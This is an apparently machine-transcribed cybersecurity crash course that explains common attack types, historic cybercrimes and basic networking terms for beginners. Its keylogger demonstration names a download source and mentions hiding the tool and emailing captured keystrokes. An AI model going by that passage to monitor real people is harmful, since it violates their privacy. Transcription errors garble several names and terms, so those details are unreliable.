cyber security is crucial to everyone from governments and mncs to small businesses and individuals at home a career in cyber security is one of the finest options available today on that note hey everyone welcome to this session on cyber security crash course by simplylearn in this crash course you will learn all about cybersecurity and its concepts for any of you out there who is new to cybersecurity not to worry we will be starting from scratch we will begin this crash course with the various types of cyber attacks along with a demo for each then we will move on to understanding why cyber security is necessary and what cyber security is truly about after this we will look into the concept of ethical hacking following this we will give you an insight into the lucrative cyber security career next we will brief you all about the world-renowned cissp certification finally we will conclude this crash course by helping you with a set of the top 50 interview questions and answers that can be asked in a cyber security interview for this training with me i have our experian cyber security specialist bipin and together we will take you through the various topics in cyber security all of this in about six hours so let's start off with an interesting video on cyber security but before we begin make sure to subscribe to our youtube channel and hit the bell icon to never miss an update from simplylearn meet anne she often shops from www.shopping she has her information like email id address and credit card details saved on the website to enable a faster and hassle-free shopping experience the required information is stored in a server one day anne received an email which stated her eligibility for a special discount voucher from shoppingcart.com in order to receive the coupon code she was asked to fill in her shoppingcart.com account credentials this didn't seem fishy to her at the time as she thought it was just an account verification step little did she realize the danger she would be facing she was knocked off her feet when a substantial amount of money was wiped off her account how do you think this happened well yes the email she received was fake anne's shoppingcart.com account witnessed unauthorized access from a third party this type of attack is known as a cyber attack and the person who carries it out is called a hacker could anna prevented this attack indeed she could have with the help of cyber security cyber security involves techniques that help in securing various digital components networks data and computer systems from unauthorized digital access there are multiple ways to implement cyber security depending on the kind of network you are connected to and the type of cyber attacks you are prone to so let's take a look at the various cyber attacks that anne could have been exposed to one of the most common types of cyber attacks is a malware attack like trojan adware and spyware to name a few had ann downloaded any suspicious attachments online her system could have gotten corrupted by certain malicious viruses embedded within the attachments next is a phishing attack the type of cyber attack which ann experienced here the hacker usually sends fraudulent emails which appear to be coming from a legitimate source this is done to install malware or to steal sensitive data like credit card information and login credentials another type of attack is the man in the middle attack here the hacker gains access to the information path between ann's device and the website's server the hacker's computer takes over anne's ip address by doing so the communication line between anne and the website is secretly intercepted this commonly happens with unsecured wi-fi networks and also through malware password attack is one of the easiest ways to hack a system here ann's password could have been cracked by using either common passwords or trying all possible alphabetical combinations to prevent future cyber attacks and sought to implement a few cybersecurity practices first she installed a firewall as the name suggests it is a virtual wall between anne's computer and the internet firewalls filter the incoming and outgoing traffic from your device to safeguard your network and they can either be software applications or hardware reinforcements secondly and implemented honeypots just like how flowers attract bees dummy computer systems called honeypots are used to attract attackers these systems are made to look vulnerable in order to deceive attackers and this in turn defends the real system in addition to these she also decided to use unique alphanumeric passwords antivirus software and started avoiding males from unknown cinders that was ann's story cyber attacks are not just confined to individuals but also to public and private organizations the cyber attacks carried out in such places are more deadly and they result in colossal losses motives of such attacks are many starting from tampering with crucial data to monetary gains let's have a look at a few of the cyber attacks that companies are subjected to various public sector organizations and large corporations face the advanced persistent threat apt in this form of attack hackers gain access to networks for a prolonged period in order to continuously gain confidential information companies also witness the denial of service attack where networks are flooded with traffic which in turn leaves legitimate service requests unattended a variant of this is the distributed denial of service ddos attack when multiple systems are used to launch the attack when a hacker manipulates a standard sql query in a database driven website it is known as a sql injection attack by doing so hackers can view edit and delete tables from databases amidst a plethora of cyber attacks it is indeed a challenge for organizations with several networks and servers to ensure complete security this is not an easy task and to help with this cyber security professionals are hired to work on identifying cyber threats and securing a company's network there are multiple job roles in the field of cyber security if hacking fascinates you then the role of an ethical hacker is something to be explored such professionals try to a network's vulnerabilities just like how a hacker would do but only to identify those vulnerabilities and resolve them for protection against an actual cyber attack but if you are looking to design robust security structures then the role of a security architect is more apt a chief information security officer ciso plays a crucial role in enterprise security and is entrusted with the overall safety of the information in an organization with the increase in the production of global digital data it is anticipated that cyber attacks will quadruple in the near future organizations are going to need cyber security professionals who can prevent these attacks a career in the field of cyber security is lucrative and a very smart decision for professionals now so what are you waiting for get certified with simply learn and become a cyber security expert let's begin with the rise in cyber crimes so let's talk about wannacry this is something that happened way back in 2017 let's not say way back it's just 2019 two years back and it took the world by stop so it was a cyber attack which encrypted the data of organizations and then the hackers held that organization ransom by asking of rather demanding money from them to decrypt their own data so what exactly happened the attack originated in asia and then spread across the rest of the world note the date and how did this happen there was a vulnerability that was identified in microsoft windows the smb vulnerability smb which is server message block is essentially the file sharing and the printer sharing services that you use in a lan environment on windows operating system by default these are enabled on your desktops and there is a hardening guide that people utilize to to either upgrade the version of smb to a more secure version or disable smp and utilize something else now this was a known vulnerability and this was targeted within days more than 230 000 computers when infected across 150 countries now when we say this was identified microsoft knew of this vulnerability and in fact they had released a patch in april of 2017 to mitigate this vulnerability within two months of that release this attack had happened now in a real world scenario it is not possible for all the servers and devices to be upgraded to the latest patch level because organizations need to test those patches to see if those patches are going to interfere with the services that they are providing and hence no organization will be completely patched up at any point in time and this was the flaw that sadly took down a lot of organizations the patch was available but it wasn't testing somewhere not utilizing it yet and they did not see it as a high value risk and suddenly something happened and wannacry took place now what happened was a crypto worm called wannacry which basically encrypts the data and locks the user out of their own computers and they get a screen in front of them which says your data has been encrypted and it gives them a link and they are they demand uh 300 to 600 to be paid to the hackers to retrieve the decryption key for their data now here obviously you're not going to pay cash to hackers neither are you going to make a bank transfer because both of the ways you can identify the hackers and then pursue them so the hackers demanded this exchange via bitcoins cryptocurrency this is the best way to remain anonymous and the best way to make payments over the internet without being identified so what was the impact of the attack around two hundred thousand to three hundred thousand computers were infected now it sounds like a small number of computers when you're talking about global however the services that it affected were huge in uk the national health service got affected all the databases got encrypted surgeries and treatments of patients were postponed fedex renault nissan all of these organizations got compromised and the production lines basically shut down for a few days till they retrieved data from backup started to restore and then tried to bring back everything to normal then in february 2019 dunkin donuts announced that the users of their reward programs were targeted by a credential surfing attack that means that the attackers stole the credentials usernames and passwords of customers of dunkin donuts now we think dunkin donuts they sell donuts how much could it impact anyone but if you have an online account with dunkin donuts you also have your personal identifiable information stored in those accounts for example your name address credit card information maybe your social security number or your national insurance card or something like that which can lead to identity theft people can misuse that information pretend to be you and then take out loans or do transactions in your name where you are going to end up paying those bills so stealing of such kind of data is going to impact all the users adversely so the first name last name and email ids were stolen that is still good enough to launch social engineering attacks and target these victims uh to phishing attacks or similar attacks so now let's look at the different types of attacks in cyber so we are going to discuss these six malwares we are going to talk about social engineering attacks man-in-the-middle attacks denial of service sql injections and password attacks now if you look at this malwares basically target hosts operating systems social engineering attacks would address or attack the gullibility of a human being with the help of a computer for example sending a fake mail or hosting a fake website man in the middle attack would target a network and then try to capture data packets within the network thus compromising your credentials a denial of service attack would crash a service sql injection attacks would attack an application and a password attack would attack the usernames and passwords of accounts thus taking advantage of weak passwords and getting access to your accounts so let's start with malware malware basically refers to malicious software the first part of malicious mal and the where out of software becomes malware malwares are nothing but vehicles in which hackers embed payloads payloads could be viruses worms ransomwares trojans so they hide these kind of malicious softwares within legitimate looking softwares and they post them on the internet people who are interested in those kind of softwares will obviously download them and since they're looking very legitimate they will try to install them thus accidentally and unknowingly installing a trojan virus or a ransomware on their machine now most of us have done this at one point in time where we have looked at pirated software because we did not want to pay for it and then we we probably go to torrents and then search for those softwares download them and there's a keygen.exe over there which we have to execute and then we have to copy that code the exe file that comes out or with the key gen and then we have to replace it and i mean it's a very convoluted process but the fact that you have to restore some code with some other code would basically mean that there is something wrong with that file so 99 percent of the time these programs would have viruses or trojans embedded within them and it is going to affect the security posture of your uh computers if you scan keygen.exe with any antivirus across the globe they will always report them as malwares and they will probably want to delete those kind of files so how do these get infected it gets infected into a system when the user clicks on a suspicious link now obviously if you think it is a suspicious link you're not going to click on it but you press the link or you're compelled to click on it just out of curiosity let's say you click on that link there's a redirector it downloads an attachment from a malicious server and it gets installed on your machine most of the common ways a virus or a worm is spread is through usb devices people pass around usb devices like nobody's business and you have no idea where the device has been used before and you plug into your machine and if there is a virus on that usb device it will get infected on your machine as well malwares are nothing but malicious softwares that pose as legitimate softwares but will have a virus trojan or a worm embedded within it right it could also be a keylogger a keylogger is nothing but another software that is created to catch all the key strokes that the user is making create a copy of it and store it and send it back to the hacker so whatever the user is typing it will now be known to the hacker it could be bank details passwords any personal information that the user might want to keep secret we are going to look at three different demos here this demo is just to showcase a couple of things uh we're going to look at a key logger how a key logger works this virtual machine here and i've already downloaded a keylogger and installed it the idea of this demo is to showcase how a keylogger functions right so you can see online on the screen we are using a free keylogger.en.softtoney.com here on this site and you can download the free keylogger right from here what i've done using my demos is that i've always have a keylogger running in the background to capture all the keystrokes that i've been doing whenever i'm doing any demos so this keylogger here can actually be hidden in the taskbar but for our demo purposes have kept it visible when you click on it it will open up and give you a basic screen where you can start navigating about the keylogger now you can see that on 8th which is today it already shows some keystrokes applications and some visited websites as you can see already been browsing using the browser over here and which has been recorded by the keylogger in the background and just to give you an example if i click on this file you will see all the keystrokes that i have been doing so far and you can see i've gone to this i've opened up my mozilla firefox i've typed in a key search keyword of free keylogger then i've gone on to the website how secure is mypassword.net in which i may have tried out a few passwords myself and then i've gone and copy pasted this url into the browser window and you can see all of this has been recorded and just to emphasize on that let's go on to another website and let's say let's go to facebook.com i'm not actually going to log in i'm just going to type in a random username so someone at simplylearn.com and a password like asd 381234 and i'm going to try to log in obviously the login is going to fail because this account doesn't exist but we want to see what happens in the background when the keylogger picks up the keystrokes that we have typed so let's open up the keylogger again and go and see what is there in the keystrokes and clipboard and you can see over here that we typed in facebook.com enter and then we did not type in the username that's the difference here we selected it from a drop down so a keystroke logger or keylocker has not been able to capture that input a keylogger in its essence is only records something that has been typed in by the user real time since we did not type in the username it did not record that username but we typed in the password and you can see the password over here asd at the rate one two three four and this is how a key logger works it only captures the keystrokes that have been typed in real time so if we use this exercise on our victims and they're just using drop down menus at that point in time none of the data is going to be recorded for that activity you would need something which is known as spyware which would capture screens which would capture all of this information that is going on now apart from just logging keystrokes what this software also does is it also has a list of used applications you can see all the applications that have uh booted up along with the operating system and the ones that have started up after the operating system has booted it also has a list of the visited website so you can see these are the websites that we have been visiting and uh they have been listed right here the last one being facebook login or sign up right so this can store history for a really long time if i go back in time and if i look at some of the demos that i've been looking at so on 14th of september these were the keystrokes that i utilized when i was doing some trainings while i was providing some demos on other topics so a keystroke or a keylogger will store all that information and keep on recording it till you actually delete that data or you can uh you can reset the keylogger you can also set up the keylogger to send the email to you on a daily as a daily report to a particular email address that you have sent so as long as it detects the internet connectivity this keylogger will send you an email to the email address that you have specified with all the keystrokes that it has locked now this is the free version there is again a paid version for it so you can go and visit this site and see how this keylogger functions if i press on the x button over here it will ask me if i want this to be hidden in the system tray if i click on yes it only using this shortcut will i be able to invoke this screen so just for demo purposes i do not want this to be hidden so i'm going to click on no and you can see that the keylogger is still visible over here so that was the first demo that we are seeing viruses as we all know are destructive programs that once executed would destroy data or harm the hard disk or the partition tables worms on the other hand would be software's that would be more of a nuisance value where they're going to replicate themselves in such a way that they would consume the resources of a computer thus crashing the computer and then requiring a reboot a trojan horse is another software that will allow a backdoor entry or a covert channel to that hacker where the hacker in this case would then be able to gain access to the victims machine through the covert channel or the back door without the knowledge and the authorization of the user themselves let's talk about social engineering attack now this is where your people skills come into the picture this is the art of manipulating people and convincing them to give up confidential information either knowingly or unknowingly so most likely well uh we trust our friends right and we talk to them a lot and we give out some confidential information which we would not give out to others what if somebody is pretending to be our friend just to get this information out of us and we trust this person to give out that information and we suddenly get affected because of that now i'm not saying that everybody in the world does that but it is one of the most common attacks that is experienced in the computing world now social engineering attacks can be broken down into three categories first is a phishing attack don't worry about that figure over there you're actually not going to go fishing it's but basically what known as a fishing attack then there is a spear phishing attack and then there's a veiling attack all of these are types of social engineering attacks where you of uh where you're targeting a user by sending out fake mails or fake websites and their gullibility into clicking on those links and then giving out information so what is a phishing attack it is a practice wherein a hacker usually sends fake mails which look really genuine or hosts fake websites which also look genuine and looks like they're from a trusted source once you click on those links there would be embedded scripts or embedded malwares which would then be executed and and then get installed on your machines compromising the security of your device these utilities could be used to steal credit card information create steal data from your computer upload data to your computer use your computer as a bot and anything and everything that the hacker might want to do spearfishing is a variation of fishing now fishing is a non-targeted attack it is to the whole world at large whoever becomes a victim becomes a victim however spear phishing is a targeted attack it is to a specific individual or to a group of individuals in an organization so it becomes a customized attack you identify the victim you identify the flaws that are existing over there in the organization you identify the gullibility of the victim create that fake mail to suit that particular situation send it across to them they'll click on that link and get infected by whatever payloads that you have embedded within it railing is when you are targeting particularly wealthy or powerful people in the industry so normally uh when you're targeting ceos cfos high level management people of an organization it would be known as a veiling attack so here the example is where the email has been received your customer your account is going to expire today to keep your account activated please click on the link here and proceed with the verification process now here the link that we see activate.com would be a hyperlink which is going to mask the actual url with the link is going to redirect us right here the attack is on the gullibility of the customer where they would fear that the account would be deactivated and to prevent that they would press this email click on the link and then provide the information thinking that they're just reactivating their account but they're actually leaking their own information to the attacker so the first thing you have to understand is banks or any organization are not going to send you any emails with the link in it asking you to reactivate or anything like that in fact banks proactively tell us that they are not going to give call us and ask for any information in fact they would want us to call them on their registered number or the helpline number that they have declared on their website or on the cards that we possess this is something very common in today's world this is basically where the prey is the human itself and the reason social engineering attacks are very successful is because of the gullibility factor that a human has for example human has something called emotions that a machine wouldn't you could plead with a human for a password to be reset by gaining sympathy or empathy but try doing that with a machine those attacks are going to fail social engineering attacks are not only limited to those but we can talk about phishing phishing is also a part of social engineering attack where the gullibility of the user to click on that link is being exploited in this scenario here this is clark is calling from the id security team that means that he is impersonating probably and then telling the victim that the system has been compromised please share the password with me the victim on the other hand thinks that the person is trying to help her probably doesn't verify that person trust that person and then provides the password over the phone now here it is fear that is being exploited because the password being compromised would uh clearly upset the end user for loss of data or for the computer revealing out confidential information thus here that she's trusting the id security team for the password to be reset and given back to her then we come to the network attacks man in the middle this is also known as eavesdropping attack which literally means that you are going to listen in on to somebody's conversation for example in the figure the client is trying to talk to the server but you become a man in the middle and you try to listen in on the conversation that is going on now obviously the conversation over here may not be audio but the data that is being exchanged between the server and the client you just listen in you make a copy of that data and you store it at your end the data could contain usernames passwords may contain confidential information and help you compromise data the attacking computer takes the ip address of the client so you find out the ip address of the client the client is not aware of about this the client is trying to communicate with the server you spoof yourself as a default gateway or a trusted device and the client thinks that it is through you that they need to communicate to the server and thus they start sending data via your pc so this attack normally happens on public wi-fi networks i've seen that happening a lot and does i never recommend anyone using those public wi-fi for example you go to a coffee shop they have free wi-fi over there you connect to it and you start surfing you start browsing you are always signed into google facebook accounts your bank accounts and whatnot and then there's a sniffer there is a hacker who is doing a man-in-the-middle attack capturing all that data now it's not an easy attack but it can be done so this diagram shows where the man in the middle attack has become successful and now that the client and the server both are sending information via the attacker without knowing them knowing that the attacker is capturing all that data uh here suppose you're in trouble and you need money right now and you call your friend and ask for money so here the person is calling john uh telling john that they're in trouble and they are asking for john to give their credit card number over the phone now this is a legitimate transaction the friend is actually calling john and asking for some help however when john is providing that help over the phone with the credit card numbers maybe the cvv number and all of that and then the otp at the end of it at the same time there could be a hacker doing a man in the middle attack where they could be eavesdropping on whatever is being said or whatever data is being transferred and once they capture this confidential data they can then misuse that data to their own gains then comes the denial of service attack the motive in a dos attack is not to benefit monetarily but to bring down a service for legitimate users that's just causing harm to the organization for example if i consume the bandwidth of to a particular website since there's no more bandwidth left other legitimate users who want to interact with the website will not be able to connect to the website thus creating a denial of service to those legitimate users now it may not be possible for me to use my laptop to target a cluster of servers because obviously the bandwidth at the other end would be very high so i would distribute my attack across multiple devices thus creating a distributed denial of service also called a ddos attack then we come to the sql injection or sql sql stands for structured query language which is the de facto language that is used by applications to interact with databases so let it be a microsoft sql database mysql database oracle sql the syntax may be a little bit different but it is still the structured query language that applications utilize to interact with the database now the queries that are created by the applications need to be sanitized at the application level itself so developers need to be very careful of how they are going to create those queries what queries are allowed to go to the database because a database is designed to answer queries it doesn't know what is a legitimate query and what is a illegitimate query if it receives a query it is going to try to execute it and give out information thus a hacker may insert malicious queries or malformed queries into a sql server through the vulnerable application causing a security event so depending on the queries that have been created the attacker could delete some data or modify data add data edit it or do anything that is malicious in nature that would compromise the integrity and the security of that database for example the dunkin donuts right except apart from being a credential attack since they got access to the database they could have added or deleted any information about any users that were there as the name suggests this attack is used to crack or get the password for users account or when we say crack passwords this is basically where somebody is trying to brute force or they're trying to guess the password and they're going to break the password thus getting access to your accounts there are five different ways passwords can be cracked the first one is a dictionary attack where we use every password that is possible through the dictionary now this is the use of an actual dictionary and that's one of the reasons when we try to create passwords we are advised not to create passwords based on dictionary words because these are easily guessable and there are lists already out there that contain all of these words there's a tool that you can utilize and that tool will then pass through each and every word that is in the dictionary file and then compare it to a possible password if one of the words matches the password has then be compromised so if you are observing a little bit higher security where we have created a password that is not based on the dictionary word then we want to look at other attacks like brute force it is a trial and error method so basically what we do is we identify how the passwords were created for example in today's world the policies would be to consume in a password any uh any of the alphabet characters a through z uppercase or lowercase 0 through 9 and then special characters and then we want to randomize the uh usage of these characters so that they are not easily guessable but a brute force attack at the same time would then try every permutation and combination there is possible in the entire character set and then try to figure out the password now this takes a really long time and does take a lot of compute and storage power and that's where the botnet example comes in comes back in the one that we saw earlier which was used for dos attack but similarly if i have infected multiple computers like this i can then distribute this attack onto all those computers and use the entire compute power that is available to shorten the time that is required to uh crack the password now based this is 100 successful given the time that it may take so if the time that is going to take is going to be a hundred years the attack becomes unsuccessful because during that period uh the password is most likely to be changed the technology is going to be changed and so on so forth so if the password is easily guessable this can be a very easy attack to perform then a key logger which is a similar attack to what we have seen so a key logger as discussed earlier is nothing but a software that once installed on your machine would grab each and every key stock that the user has made and store it in a file which the hacker can later on access so whatever you have been typing passwords credit card information or anything else all of those would be recorded and stored in the file and that's one of the best way a password can be compromised then shoulder surfing this is a physical attack rather than being a technical one here you need to be physically present when the user is typing in their password and you actually look over their shoulder to see what they are typing and try to figure out what the password is if they are quick typers it is going to be a little bit more difficult if there's slow typers it's going to be that much more easy and the last one is called a rainbow table now passwords when applications store them are stored in hash format hash is nothing but a one way signature that is created of the password file of the word that is used for the password and it is based on an algorithm so the input could be a variable length for example a password could be 7 to 14 characters but the output of a hash value would be fixed based on the algorithm that you're consuming so most common algorithms in today's world that we utilize are sha secure hashing algorithms before that we use md5 or message digest so all of these convert the passwords from plain text into a hash value and store it into a database so if you actually attack that database to grab a password you're going to get the hash value not the password in clear text and thus in that scenario comes the rainbow table to the rescue a rainbow table is nothing but a file that will have the list of all possible passwords along with their hash values in the required format so if you remember the dictionary attack the dictionary attack was nothing but a list of words based on the dictionary that were stored in a file and then the software was just trying each and every word against a possible password here we do not have the word but we have the hash value so to reverse engineer hash value what we created is we created a rainbow table where there would be a list of other possible passwords and their corresponding hash values so we then compare the hash value that we have captured and then search for that hash value in the file that we have created the hash value that matches the corresponding word to it is the password in clear text so these are the five types of password attacks now let's talk about the types of network attacks an active attack is an attack when the intruder attempts to disrupt the net network's normalcy and modifies the data and alters that data at the same time so as you can see in the diagram there's a sender and there is a receiver the attacker is the man in the middle who is now trying to create the active attack so when the sender sends that data to the receiver the attacker intercepts that data modifies the data and then sends the modified data to the receiver since the attackers is a man in the middle as we have seen in the previous attacks the receiver neither the sender would be aware of the attacker and thus they would not be aware of the modification that has been done in a passive attack the intruder just eavesdrop on the data they just listen in on to the conversation but they do not modify the data at any time so they just capture the packets they copy the contents so that they can use that at a later stage let's look at the history of cyber crime so as you can see this graph shows us how cyber crime has progressed over the years in 1990s mnc database pentagon and ibm were hacked in again in 1990s national crackdown on criminals microsoft nt operating system pierced so uh this is where hacking started becoming more mainstream right before this hacking was very much limited to organizations who used computers but in the late 80s internet happened and then we had e-commerce coming in which basically led to our online retail stores online banking and online data stores as well which then led to criminals hijacking this data or hijacking your money and trying to steal it on the internet itself in 2001 cyber criminals launched attacks against ebay yahoo cnn amazon and other organizations 2007 this was where one of the biggest bank hacks had happened swedish bank nadia they recorded at least a million dollars being stolen in three months from 250 accounts 2013 adobe had 2.9 million accounts compromise and their usernames and passwords released on the open internet in 2016 kaspersky one of the leading antivirus providers to the world reported around 758 million malicious attacks that occurred which they identified themselves these are some of the most famous faces in cyber security or earlier cyber crime in 1988 robert morris he's an american computer scientist and entrepreneur he's best known for creating what is called the morris worm and this was way back in 1988 and this is the first computer worm that has been identified on the internet kevin lee or kevin lee polson in 1990 uh he was accused of hacking into a los angeles los angeles radio station called kis hyphen fm where there was a contest going on and if you're a particular number of caller and give a correct answer you're supposed to win a porsche 944 and he hacked the those telephone lines ensuring that he became that particular person and answered the question correctly uh it was later on revealed that this actually happened he was jailed for it then comes david smith david smith he created the melissa virus now melissa virus one of the most dynamic viruses known around march 1999 that's when this happened this virus was released and this was a macro based virus which affected microsoft world and outlook based files adam bought bill in 2004 he's also an american computer hacker from michigan he gained unauthorized access to love's computer corporate computer network via an open unsecured wireless access points now these access points back then were not that much secured uh the these people were able to identify it what they tried to attempt by doing that was gain access to the company's network and install the software which would then help them capture credit card information of that organization right and uh this was later on identified as well and uh he was prosecuted for that crime and got jailed just a matter of trivia kevin lee polson uh he was one of the first people found guilty and was banned from using computers and the internet for three years after his release in today's world we cannot even imagine living without the internet this guy lived for three years without it now let's go a little bit further and see what would motivate people for committing such cyber crimes right the first and foremost motive is disrupting business continuity others would be uh looking at data theft or information theft and manipulating that data to gain from that data so if i'm able to access your computer and steal some data that has some value to you and sell it or make it public you would be at a financial loss because that data no longer has any value creating fear and cures by disrupting critical infrastructure for example a company's infrastructure crashes the services are no longer being offered by that organization and people start panicking uh start fearing an attack by cyber criminals and uh it leads to chaos financial loss to the target which is very obvious if i do a denial of service attack or if i make a service and a variable from an organization what is going to happen is since the that service is not functioning uh the company is not going to make any money out of it and that's going to suffer a financial loss achieving states military objectives a one country spying on another country trying to gather information about their military intelligence military activities or any other activities that can harm the original country demanding ransom hackers can encrypt your data and then demand a ransom from you in lieu of decrypting the data again damaging a reputation of a target impersonating a user on the social media platforms making false statements thus damaging the reputation of that person and propagating religious or political beliefs religious fanatics promoting whatever cultures that they want to promote trying to gain more followers thus bringing more unrest to the world any of these could become motives for cyber crime so this is why we want cyber security cyber security should be in place to prevent these kind of attacks so what exactly is cyber security it refers to the practice of protecting networks programs computer systems and their components from unauthorized digital access and attacks so whatever your digital footprint could be servers computers switches routers web servers web applications that you're hosting over there services that you're consuming from the cloud or providing to other customers you need to secure all of these to ensure that the integrity and the confidentiality of these services is intact and none of these services are affected by any cyber attacks which could lead to disastrous results so the main difference we want to understand here is the difference between cyber security and information security information security is data within the organization where they handle sensitive information or proprietary information copyrighted or patented information and they want to secure it from data leaks or having the data in somebody computer's hands cybersecurity is basically a technique used to protect the integrity of network so this is when you're going to go on the web and on the internet you're going to secure your devices that you have deployed allowing people to access your infrastructure from the outside so what could be the cost of not being cyber secure if you get hacked or if your data is compromised or if your information is compromised you could have a lot of repercussions your good will be go for a task you may be open for lawsuits not only from clients but from customers as well you could be open for fines or penalties from government organizations for failing to follow the law of the land customer trust will obviously be hampered if you have been hacked and your data has been compromised you wouldn't want to deal with that organization in the future all of this could land the organization in a financial crisis where all the lawsuits and penalties that are being imposed could basically bankrupt that organization and does take it out of circulation so now let's look at some basic terminologies which we need to understand to go further in the cyber security world first and foremost network what is a network network is nothing but a group of interconnected devices could be servers could be workstations could be laptops could be any devices file printers and what not to be interconnected with each other as you can see in the in the diagram it is used for communications it's used primarily used for data transmissions and to communicate between various terminals so that the business can go on it is also used to share data information it could be wired or wireless so you got a wired lan or at home we all have wireless networks where we connect all our devices we use them for streaming videos we use them to connect to the internet serve websites work from home so we've got office also set up on our wi-fi so a network is nothing but a collection of interconnected devices that are allowed to communicate each other freely so that the business can be continued in a proper manner server the server is nothing but a hardware device that is supposed to handle requests of data information allow network services to function from other computers and devices so this is where we build a client server relationship where on the server we've got uh we've got the major software we got the we got the data that is stored over there and clients that interact with the server to consume that data in a particular manner that would help them make sense and analyze that data and generate business out of them then the internet internet is nothing but the collection of multiple networks globally so all the networks that we have across the globe when they are interconnected with each other that is what internet is and if we just go back and we talk about servers this is what allows the internet to be formed so every organizations when they publish their servers on the internet and they allow everyone to interconnect through those servers that is where the internet comes in the servers being the backbone of the internet obviously for the servers to communicate with each others we will need switches routers and other devices for the data transmissions to happen so these are the multiple networks could be individual networks internet interconnected together would form the internet across the globe for the internet to work there would be a set of protocols for transmissions to be allowed across the globe now this is where tcp iep or the transmission control protocol over internet protocol comes into the picture so if you remember we use communication channels like tcp or the transmission control protocol and udp user datagram protocol when we connected connect to web servers we talk about the http protocol and https protocol if you wanted secure then we'll talk about imap pop3 and all of these protocols now where do these protocols come from it is nothing but a suite of the tcp software which contains all of these protocols which allow com computers to communicate with each other if tcp wouldn't have been there our network would have collapsed now when we have tcp ip and we want to communicate across the globe how would we identify devices on the internet or even on the intranet because the devices don't know us they are not going to use our usernames and passwords to communicate with each other but when i want to connect to a website or a device how do i identify it on the intranet or the internet i obviously use ip addresses now ip addresses are nothing but the internet protocol addresses which are 32-bit addresses which look exactly like the one shown on your screen 172.16.254.1 now there is a lot of classification of ip addresses and some of these ip addresses work on the internet some of them are supposed to work on private lands but i will reserve that for a later topic then the second way that we are identified on the internet or the internet are with mac addresses so media access controls or mac addresses are hard-coded addresses that are given to our network interface cards these cannot be modified physically at any point in time however there are techniques to spoof mac addresses which we can then obfuscate our existing address and give us a new one that would again be discussed in a later in a later lecture a router we've been talking about routers and switches router is nothing but a device that passes packets back and forth across networks it routes the data in the appropriate path so it is an intelligent device it can understand ip addresses and mac addresses it can identify different parts of reaching a particular network for example if i'm sitting in india and i want to communicate across the world to america there would be a specific path that needs to be followed for my data packet to reach the other side of the world it is the routers that would map this path store it in their cache so when i tried to connect to that server they would retrieve it from the cache and send the packet across the globe so the home router that we use at home on wi-fi is our default gateway to connect to the internet and thus it allows our internal devices to communicate with each other within using internal ip addresses and when we want to go to the internet it will then route the traffic on the internet and send the packet to other servers that we want to communicate with now what is a domain a domain is referred to as a group of computers and other devices that are interconnected and treated as a whole now a do menu is used by an organization so let's say if i am xyz xyz being the name of the organization and i want to create and a domain which will allow me to create a group of interconnected computers for my employees to interconnect with each other and send and manage data i am going to create a domain for my organization and attach all the devices create users and interconnect them using a domain so this is where you are going to have a centralized approach of a server client relationship where you're going to have a main domain and you're going to have devices connected to the domain now when we go on to the internet the domain name is nothing but the base part of a website name so when you say google.com and you type it in your browser you're taken to the webpage called google.com which is the search engine that you're connecting but for google the organization at the other end they would have a data center over there which would have all that relevant data which allows you to search through that information so for them the domain would be the internal part where they've got this cluster of servers creating a data center where all that information is stored but for us as consumers a website called google.com would be a domain for us to visit that particular website and consume the services that they're offering on the internet so here the example is https which means that it is a secure website port 443 and we're connecting to cybersecurity.com cybersecurity.com becomes the domain name https becomes the protocol that we want to utilize to connect to that particular website then we come across dns or the domain name system it is nothing but an index something like a phone book which is responsible for mapping the domain name into its corresponding ip address now remember i said that there are only two ways we are identified on the internet or the intranet either the ip address or the mac address if it is devices if it is computers who are talking to each other it would obviously be ip addresses but if i type in google.com i'm giving it a domain name the internet does not understand domain names so there is a dns a server which is an index or works like an index or more like a phone book which will have a list of all the domains with the corresponding ip addresses so whenever i type in google.com the request goes to a dns server the dns server is queried the ip address of google.com is identified pasted onto the packet and then the packet is routed through the router to the path that it has determined to reach the google.com server here replace google.com with cybersecurity.com so as you can see on the screen the local pc queries the dns server the dns server replies back with the ip address now if you're wondering how does this work if we're going to take an example of home networks the isp or the internet service provider gives us a default gateway or a router with their own ip addresses for dns servers and default gateways so when we try to connect through the router the router has the ipr of the dns server and it routes that query to the dns server the dns server replies back with the appropriate ip address the router then takes that ip address figures out the path and sends it across to the targeted server dhcp or the dynamic host configuration protocol it is a protocol that dynamically assigns ip addresses to the devices in the network so we have discussed that ip addresses are required by computers to communicate within each other but who associates or who gives these ip addresses to these computers so for that to happen we have got a dhcp server that is created if you take your home networks it is the router that has the dhcp role installed on it so whenever a machine boots up it sends out a broadcast request looking for the dhcp server and then there's a communication with the dhcp server the dhcp server then allocates an ip address to the computer who is requesting it and once the ip address is allocated an entry is made in the dhcp servers cache with the corresponding mac address of that particular machine then we come to the next top topic called vpn or a virtual private network it is a connection between a vpn server and a vpn client it's basically a encrypted channel that you're creating between two end points and the main reason for a vpn is to encrypt your data so that it is now no longer subject to man in the middle or eavesdropping or modification attacks so this is a layer of security that you're adding when you're connecting to the internet using an encrypted channel which should prevent you from getting hacked or your data being compromised by hackers so as you can see here and if you remember the previous top uh previous slides that we have seen the hacker was able to copy the data very easily now that it is an encrypted channel even if the hacker tries to eavesdrop and capture that data it will be formatted in such a way that they would not be able to make sense out of it now the attacker or the hacker will try will have to try to decrypt the data so that's another attack that they'd have to execute to find out the encryption key decrypt the data and then look at what the data was then we come across botnet now first let's first understand what bots are bots are nothing but the softwares that can be installed on vulnerable machines that would allow the hacker to send commands to the infected machines to generate some traffic or to do what the command tells them to do so most of the botnets are used for distributed denial of service attack if you remember the dos and ddos that were discussed a while back this is where we tied up with how they are executed so a bot master or a hacker let's call them a hacker would try to identify vulnerable devices across the internet and try to install the port onto those devices the bot essentially is a software that would revert back to the bot master and advertise their availability whenever they have been powered on a collection of such infected devices would essentially be called a botnet when there are enough number of machines that the attacker fell fields are good enough to launch that attack on the targeted servers the hacker will then initiate those devices send the commands through the botmaster to the bots and the bots would then generate that kind of traffic what uh whatever they have been configured for and then attack the targeted server now this is also done to opt to mask the identity of the hacker since the attack is being generated through the botnet the ip addresses of the botnet computers would be reported to the targeted server not the actual hacker's ip address so it to figure out who the attacker was would be very much difficult depending on the size of the botnet so this you can see is the attack that has been created over the victims and the malicious traffic has been generated through the botnet and the victims have been targeted through that so as said once that traffic has been done to forensically investigate at the victims and they would find the ip addresses of the botnet and not the attacker all right let's start talking about network security controls network security controls are nothing but implementations of various devices to enhance the security of a particular network these could be firewalls intelligent detection systems or intrusion prevention systems honeypots unified threat management systems and so on so forth the next gen firewalls that we talk about right so let's look at a review of what these devices are now a firewall can be a hardware or a software that is responsible for allowing or disallowing a 